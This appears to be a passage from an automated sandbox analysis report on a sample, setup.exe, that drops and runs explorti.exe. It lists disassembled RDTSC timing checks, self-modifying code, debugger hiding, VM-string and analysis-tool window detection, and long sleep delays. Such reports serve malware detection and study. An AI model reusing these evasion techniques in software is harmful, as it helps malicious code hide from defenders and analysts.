eax 0x0000004d push edx 0x0000004e jmp 00007FF32CFB7209h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CCF second address: 4DF0CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CDF second address: 4DF0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CFB71FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CF6 second address: 4DF0D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007FF32CDD656Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FF32CDD6569h 0x00000013 jmp 00007FF32CDD6570h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov eax, 37BA5829h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D2E second address: 4DF0D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF32CFB7209h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF32CFB71FCh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D6E second address: 4DF0D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D80 second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FF32CFB7209h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB71FDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0526 second address: 4DA052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA052C second address: 4DA0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0530 second address: 4DA05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c call 00007FF32CDD6570h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF32CDD656Dh 0x0000001f and ax, E536h 0x00000024 jmp 00007FF32CDD6571h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FF32CDD6570h 0x00000030 sbb ecx, 2AE92C58h 0x00000036 jmp 00007FF32CDD656Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05A5 second address: 4DA05A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05A9 second address: 4DA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05AF second address: 4DA05F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FF32CFB7200h 0x00000010 push FDA9B50Dh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a add dword ptr [esp], 79980B0Bh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bl, ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05F1 second address: 4DA0649 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD656Fh 0x00000008 add ch, FFFFFFDEh 0x0000000b jmp 00007FF32CDD6579h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 call 00007FF32CDD6569h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF32CDD6579h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0649 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0679 second address: 4DA0731 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6579h 0x00000008 and ax, D986h 0x0000000d jmp 00007FF32CDD6571h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF32CDD6570h 0x0000001b add ch, 00000028h 0x0000001e jmp 00007FF32CDD656Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FF32CDD6579h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF32CDD6571h 0x00000035 pop eax 0x00000036 jmp 00007FF32CDD656Eh 0x0000003b mov eax, dword ptr fs:[00000000h] 0x00000041 pushad 0x00000042 mov dx, ax 0x00000045 mov ecx, 176D2139h 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FF32CDD656Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0731 second address: 4DA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0740 second address: 4DA0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 94h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0747 second address: 4DA0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FF32CFB7207h 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 add ax, 5808h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ecx 0x00000022 popad 0x00000023 sub esp, 1Ch 0x00000026 pushad 0x00000027 mov esi, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d push esi 0x0000002e jmp 00007FF32CFB7202h 0x00000033 mov dword ptr [esp], ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FF32CFB71FEh 0x0000003d adc ch, FFFFFFC8h 0x00000040 jmp 00007FF32CFB71FBh 0x00000045 popfd 0x00000046 mov edx, ecx 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, si 0x00000050 pushfd 0x00000051 jmp 00007FF32CFB7208h 0x00000056 xor ecx, 77A45258h 0x0000005c jmp 00007FF32CFB71FBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0806 second address: 4DA084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD656Eh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov eax, 3666D7ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA084F second address: 4DA0877 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1B0168EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e mov esi, 576EE9BFh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7201h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0877 second address: 4DA0919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FF32CDD656Eh 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 movzx ecx, dx 0x0000001a call 00007FF32CDD6573h 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 xor eax, ebp 0x00000025 pushad 0x00000026 mov al, 9Eh 0x00000028 popad 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FF32CDD6572h 0x00000030 jmp 00007FF32CDD6572h 0x00000035 popad 0x00000036 mov dword ptr [esp], eax 0x00000039 jmp 00007FF32CDD6570h 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CDD6577h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0919 second address: 4DA0960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB71FFh 0x00000009 or ax, A41Eh 0x0000000e jmp 00007FF32CFB7209h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 mov eax, 0E068F39h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0960 second address: 4DA0A94 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6570h 0x00000008 sbb cl, 00000048h 0x0000000b jmp 00007FF32CDD656Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007FF32CDD6576h 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FF32CDD6570h 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 mov ax, 806Dh 0x0000002b mov bx, ax 0x0000002e popad 0x0000002f jne 00007FF39F3758CEh 0x00000035 jmp 00007FF32CDD6574h 0x0000003a sub eax, eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF32CDD6577h 0x00000043 sbb ch, FFFFFFFEh 0x00000046 jmp 00007FF32CDD6579h 0x0000004b popfd 0x0000004c push esi 0x0000004d pushfd 0x0000004e jmp 00007FF32CDD6577h 0x00000053 sbb cl, 0000000Eh 0x00000056 jmp 00007FF32CDD6579h 0x0000005b popfd 0x0000005c pop ecx 0x0000005d popad 0x0000005e mov dword ptr [ebp-20h], eax 0x00000061 jmp 00007FF32CDD6577h 0x00000066 mov ebx, dword ptr [esi] 0x00000068 jmp 00007FF32CDD6576h 0x0000006d mov dword ptr [ebp-24h], ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FF32CDD6577h 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31EFBC second address: 31E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CFB7208h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CFB71F7h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CFB7209h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CFB71FCh 0x00000081 jp 00007FF32CFB71F6h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31E7EC second address: 31E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 479D49 second address: 479D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CFB7205h 0x0000000a jl 00007FF32CFB71F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495EAE second address: 495EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495EB2 second address: 495F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CFB7208h 0x00000011 jmp 00007FF32CFB7209h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495F02 second address: 495F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495F07 second address: 495F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 496060 second address: 49609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD656Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CDD6566h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CDD6566h 0x0000001f popad 0x00000020 jmp 00007FF32CDD6575h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 4961D3 second address: 4961E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CFB71F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 498DBA second address: 498E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CDD6569h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CDD6568h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CDD656Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 498E34 second address: 498E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: C8E792 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: C8E835 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: E2F857 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: E3CFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: EC77FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 31E792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 31E835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 4BF857 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 4CCFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 5577FB instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04DF04DA rdtsc

0_2_04DF04DA

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 499	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 8164	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424	Thread sleep time: -78039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740	Thread sleep count: 408 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740	Thread sleep time: -12240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3660	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep time: -998499s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep count: 8164 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep time: -16336164s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: explorti.exe, 0000000A.00000002.3368400813.000000000174B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2185921092.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2229049085.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000003.00000002.2230169054.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04DF04DA rdtsc

0_2_04DF04DA

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002E645B mov eax, dword ptr fs:[00000030h]		10_2_002E645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002EA1C2 mov eax, dword ptr fs:[00000030h]		10_2_002EA1C2

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: 35Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CD312 cpuid

10_2_002CD312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

